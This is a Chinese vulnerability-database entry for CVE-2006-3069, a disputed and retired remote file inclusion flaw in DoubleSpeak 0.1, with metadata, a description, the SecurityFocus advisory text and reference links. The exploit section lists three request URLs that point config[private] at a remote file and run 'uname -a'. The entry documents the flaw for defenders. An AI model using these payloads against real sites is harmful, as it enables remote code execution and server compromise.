RETIRED: DoubleSpeak 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110447 漏洞类型 输入验证
发布时间 2006-06-13 更新时间 2006-10-05
CVE编号 CVE-2006-3069 CNNVD-ID CNNVD-200606-373
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-373
|漏洞详情
**有争议**DoubleSpeak0.1存在PHP远程文件包含漏洞。register_globals启用时,远程攻击者可以借助多个文件中的config[private]参数,执行任意PHP代码,比如(1)index.php,(2)faq.php和(3)hardware.php。注:多位第三方研究者对此提出反驳,声称config[private]在被使用前已在include文件中初始化。
|漏洞EXP
source: http://www.securityfocus.com/bid/18401/info

DoubleSpeak is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect versions 0.1 and prior; other versions may also be vulnerable.

This BID has been retired.

http://www.example.com/[igloo_Path]/html/index.php?config[private]=http://www.example.com/x.txt?&cmd=uname -a
http://www.example.com/[igloo_Path]/html/faq.php?config[private]=http://www.example.com/x.txt?&cmd=uname -a
http://www.example.com/[igloo_Path]/html/hardware.php?config[private]=http://www.example.com/x.txt?&cmd=uname -a
|参考资料

来源:BID
名称:18401
链接:http://www.securityfocus.com/bid/18401
来源:OSVDB
名称:27436
链接:http://www.osvdb.org/27436
来源:SECTRACK
名称:1016278
链接:http://securitytracker.com/id?1016278
来源:VIM
名称:20060723IglooDoublSpeakvuln
链接:http://attrition.org/pipermail/vim/2006-July/000935.html
来源:BUGTRAQ
名称:20060612Re:iglooDoubleSpeakv0.1Multipleremotefileinclusion
链接:http://archives.neohapsis.com/archives/bugtraq/2006-06/0184.html